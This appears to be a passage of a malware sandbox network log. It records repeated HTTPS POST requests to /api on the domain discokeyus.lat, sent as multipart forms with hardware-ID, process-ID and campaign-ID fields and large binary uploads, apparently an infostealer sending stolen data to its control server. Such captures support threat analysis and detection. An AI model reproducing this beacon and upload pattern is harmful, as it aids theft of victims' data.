                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ppeBum1V08Qulmw%2BUI4EHZv2SVtAePlQGbP4S72sUktk2e3dqZGi%2Fe%2F1puWMivfJp%2FKluEJPDhgyausVumqPEmrRH9padN3Lpc9TC73OjUZwYmU3DJHbDq%2FfMWDkSM72IA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ae8c7b7e43bc-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9057&min_rtt=1805&rtt_var=5147&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=980&delivery_rate=1617728&cwnd=221&unsent_bytes=0&cid=3a7ae0422fb32fab&ts=775&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:10 UTC214INData Raw: 64 30 0d 0a 62 4b 79 58 56 4e 64 67 6c 52 6e 53 59 55 79 4d 4b 49 51 47 31 65 61 6d 47 41 78 41 71 4d 67 31 7a 78 47 6b 4c 49 49 49 61 59 77 33 31 37 55 68 39 56 71 33 63 61 59 56 50 4c 5a 30 71 31 72 36 31 35 34 74 49 6e 4b 5a 2f 52 76 2b 49 4a 63 43 73 7a 34 31 6f 77 50 4b 38 51 6a 34 42 50 42 2f 2f 41 51 30 36 51 71 6f 4a 4c 4f 53 68 43 49 38 62 49 71 74 46 2f 55 68 32 51 44 35 4b 68 79 75 56 6f 37 2f 49 4b 4d 51 72 30 58 39 50 57 4f 39 45 4c 45 6f 35 39 65 54 4e 6a 31 78 6d 2b 59 45 2b 55 32 4c 58 2f 5a 74 43 4f 45 77 67 2b 55 31 75 51 54 36 64 50 77 45 4e 4f 6b 4b 71 43 53 7a 6b 6f 51 69 50 47 79 4b 72 52 66 31 49 64 6c 78 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: d0bKyXVNdglRnSYUyMKIQG1eamGAxAqMg1zxGkLIIIaYw317Uh9Vq3caYVPLZ0q1r6154tInKZ/Rv+IJcCsz41owPK8Qj4BPB//AQ06QqoJLOShCI8bIqtF/Uh2QD5KhyuVo7/IKMQr0X9PWO9ELEo59eTNj1xm+YE+U2LX/ZtCOEwg+U1uQT6dPwENOkKqCSzkoQiPGyKrRf1Idlx
                                                                                                                                                                                                                                                                          2024-12-21 00:16:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          46192.168.2.550205172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:17 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=V6CFHUA8V8C
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 12793
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:17 UTC12793OUTData Raw: 2d 2d 56 36 43 46 48 55 41 38 56 38 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 36 43 46 48 55 41 38 56 38 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 36 43 46 48 55 41 38 56 38 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 56 36 43 46 48 55 41 38 56 38 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: --V6CFHUA8V8CContent-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--V6CFHUA8V8CContent-Disposition: form-data; name="pid"2--V6CFHUA8V8CContent-Disposition: form-data; name="lid"PsFKDg--pablo--V6CFHUA8V8CCont
                                                                                                                                                                                                                                                                          2024-12-21 00:16:17 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:17 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=janjvmfr2fhk21v5md2i9bu567; expires=Tue, 15 Apr 2025 18:02:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tumqspMRKZ9b3D%2BvK2KhTQdWlS8I3izGE3INPDpVA0IEKREi6Lio3QOgMHWQifFX4XNBhZxhcVQHdPjCmLKywnc8meoOJFbG8tUfKMc%2BRN9MU43uXKwcthWxpeoMI4Iplg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53aebbf86c4402-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8086&min_rtt=1682&rtt_var=4588&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2832&recv_bytes=13724&delivery_rate=1736028&cwnd=182&unsent_bytes=0&cid=23c9d5756b6b9696&ts=841&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:16:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          47192.168.2.550216172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:19 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=Y2UHFZ6F0HL64
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 16306
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:19 UTC15331OUTData Raw: 2d 2d 59 32 55 48 46 5a 36 46 30 48 4c 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 59 32 55 48 46 5a 36 46 30 48 4c 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 32 55 48 46 5a 36 46 30 48 4c 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 59 32 55 48 46 5a 36 46 30 48 4c
                                                                                                                                                                                                                                                                          Data Ascii: --Y2UHFZ6F0HL64Content-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--Y2UHFZ6F0HL64Content-Disposition: form-data; name="pid"2--Y2UHFZ6F0HL64Content-Disposition: form-data; name="lid"PsFKDg--pablo--Y2UHFZ6F0HL
                                                                                                                                                                                                                                                                          2024-12-21 00:16:19 UTC975OUTData Raw: f6 b9 e8 4d a1 7b 25 59 ba 41 ff ef a3 aa 32 1d bf ee 2a b9 2e 66 74 3d c1 46 5c 2a df 78 64 aa 74 67 79 dc 94 d4 60 2d 5a 20 de 71 ec c0 5c 19 de 73 ae db 38 5b 28 2d 2f 6b 0f f2 43 6b de e2 f0 e1 ed 47 c6 ac 75 8b 43 f5 a5 c3 55 46 aa 4a e0 ed ed 05 76 f8 e9 17 7b ed 39 ae 13 34 14 cb a9 06 f5 a4 9c 5a 15 97 c8 45 59 8f bf d5 d0 8d 9b 67 a6 4a df ba 3a b9 ac 06 eb f6 92 e5 35 d8 7b 56 bc 37 cf f6 de 9f bb 8b 4f 17 4a 97 2e 69 f7 e7 a3 e2 b3 6b f5 de 7b 64 90 f8 78 39 55 68 89 00 fd e8 07 57 d4 da c9 d6 ab 1c 35 b6 83 d9 fd a8 25 96 2f 16 d1 aa 35 ab 1a bd 74 4c 98 78 ee 9e d2 0b a5 cd 65 ad 6b 44 e7 db 7f 61 eb 2d 62 09 12 6f 70 a6 32 c2 a5 d4 8d 30 f1 70 79 73 0c 47 4a bc 14 1b dd d7 2e 46 f5 ee fe cd 54 7f a1 1f 75 78 fb 69 65 ff 40 91 f0 68 ed e9 45
                                                                                                                                                                                                                                                                          Data Ascii: M{%YA2*.ft=F\*xdtgy`-Z q\s8[(-/kCkGuCUFJv{94ZEYgJ:5{V7OJ.ik{dx9UhW5%/5tLxekDa-bop20pysGJ.FTuxie@hE
                                                                                                                                                                                                                                                                          2024-12-21 00:16:19 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:19 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=rpp0dn3fcg4fs74jnqdd5l4ivh; expires=Tue, 15 Apr 2025 18:02:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hwiwsVgTy3Tk7xARUMtp8R%2F3bGt62zvWfu3Op0i3fRKlGzeenJdBIw31uYAqFKfYoP6PU7WLqsZ7YD1XV4ZScDLJszNzuYG98dxzLimQQ3Q3XN5DjAlHKye1N9c2azTvRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53aec909447d0c-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2017&min_rtt=2014&rtt_var=762&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2832&recv_bytes=17261&delivery_rate=1430671&cwnd=156&unsent_bytes=0&cid=d586317543e55069&ts=792&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:16:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          48192.168.2.550217172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:21 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=UEPHLGKF
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 20507
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:21 UTC15331OUTData Raw: 2d 2d 55 45 50 48 4c 47 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 45 50 48 4c 47 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 45 50 48 4c 47 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 55 45 50 48 4c 47 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                                                                                                                                                                                          Data Ascii: --UEPHLGKFContent-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--UEPHLGKFContent-Disposition: form-data; name="pid"3--UEPHLGKFContent-Disposition: form-data; name="lid"PsFKDg--pablo--UEPHLGKFContent-Disposit
                                                                                                                                                                                                                                                                          2024-12-21 00:16:21 UTC5176OUTData Raw: 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82 b9 75 3f 0d 00
                                                                                                                                                                                                                                                                          Data Ascii: un 4F([:7s~X`nO`i`u?
                                                                                                                                                                                                                                                                          2024-12-21 00:16:22 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:22 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=um4ebi1dviau93hnj64a71ddnq; expires=Tue, 15 Apr 2025 18:03:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lGU%2FH1OUsuRy%2B6XbR7QgQK7eypWflJNP3482wZoo0m7G3IEhVu9hZ6gsddoXXexBzNIR%2BU7zlzwWtTwE8a2w1Ofr60u9r1motWTdNDTErAZVSje8QpsvWGlhOS6jTQmBjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53aed65a664304-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1787&rtt_var=687&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21457&delivery_rate=1573275&cwnd=248&unsent_bytes=0&cid=390a7d983e07b396&ts=941&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:16:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          49192.168.2.550220172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:23 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=UUGL188587SJM
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 1384
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:23 UTC1384OUTData Raw: 2d 2d 55 55 47 4c 31 38 38 35 38 37 53 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 55 47 4c 31 38 38 35 38 37 53 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 55 47 4c 31 38 38 35 38 37 53 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 55 55 47 4c 31 38 38 35 38 37 53
                                                                                                                                                                                                                                                                          Data Ascii: --UUGL188587SJMContent-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--UUGL188587SJMContent-Disposition: form-data; name="pid"1--UUGL188587SJMContent-Disposition: form-data; name="lid"PsFKDg--pablo--UUGL188587S
                                                                                                                                                                                                                                                                          2024-12-21 00:16:24 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:24 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=hekh7nhn6ej71v5dc4c968im03; expires=Tue, 15 Apr 2025 18:03:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PJNGet8yoVHjbWymnO0UNQaVr0Yf0VONnechZ6tkj4FXxzmvOb2cKm7ZgLCghMiDgipyeNljpQUOONYnl5BR92pXg0osyyqfB0GXsnzPty2euAdi6b3ctBtj5GqMtaAYCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53aee51e234294-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2167&min_rtt=2161&rtt_var=823&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2294&delivery_rate=1320072&cwnd=217&unsent_bytes=0&cid=e54110620179cf51&ts=858&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:16:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          50192.168.2.550223172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:26 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=6VAL1Q0VC29M6V4QGEX
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 552013
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:26 UTC15331OUTData Raw: 2d 2d 36 56 41 4c 31 51 30 56 43 32 39 4d 36 56 34 51 47 45 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 56 41 4c 31 51 30 56 43 32 39 4d 36 56 34 51 47 45 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 56 41 4c 31 51 30 56 43 32 39 4d 36 56 34 51 47 45 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                                                                                                                                                                                          Data Ascii: --6VAL1Q0VC29M6V4QGEXContent-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--6VAL1Q0VC29M6V4QGEXContent-Disposition: form-data; name="pid"1--6VAL1Q0VC29M6V4QGEXContent-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                                                                                                                                                                                          2024-12-21 00:16:26 UTC15331OUTData Raw: 35 28 28 b3 01 2e 1e 11 d6 e5 08 85 18 de 37 70 5f b2 f8 a6 8b 5a 95 f5 66 f8 a3 af 5f ea 46 51 10 01 d6 dd 2b da 7c 46 a4 6c db 7f 8d 38 94 10 d0 cf 0a 53 58 34 eb 0c 62 66 fe eb 2c 26 74 69 d8 84 c4 40 cc 88 e4 ca a1 e9 bc 65 10 b0 97 aa 8d 0d e1 03 53 bd e8 c5 cd a3 43 11 87 ef b2 af 1b 14 a1 28 0d 71 95 4f 35 d2 b6 1a 23 da 8e e3 de fc 5e 78 97 7c 08 9d 80 da 2a 11 4c b1 66 e0 49 9e ad e5 4f 6d ac 74 4d 97 21 b3 36 9b 9a 8c a8 9a 31 27 7e 43 4e f6 28 02 8e 17 6f 8e 0c 36 1d 66 5a 4c 36 6e ea 26 7d 67 6b 64 57 c7 84 a5 42 48 76 a5 10 15 03 4f a3 8e fd f5 05 de 54 43 51 ca 40 f1 3a dd a0 79 49 d3 c6 b5 3a 15 8b 77 00 5f 8c c4 82 5c 66 3f 07 9c 50 22 29 ec ec 47 f9 04 3a 3e 46 c4 04 a8 b1 48 65 68 cb e5 16 3d 1c 80 ba 6c e7 6b 44 09 a9 16 7d cd 2d 99 99
                                                                                                                                                                                                                                                                          Data Ascii: 5((.7p_Zf_FQ+|Fl8SX4bf,&ti@eSC(qO5#^x|*LfIOmtM!61'~CN(o6fZL6n&}gkdWBHvOTCQ@:yI:w_\f?P")G:>FHeh=lkD}-
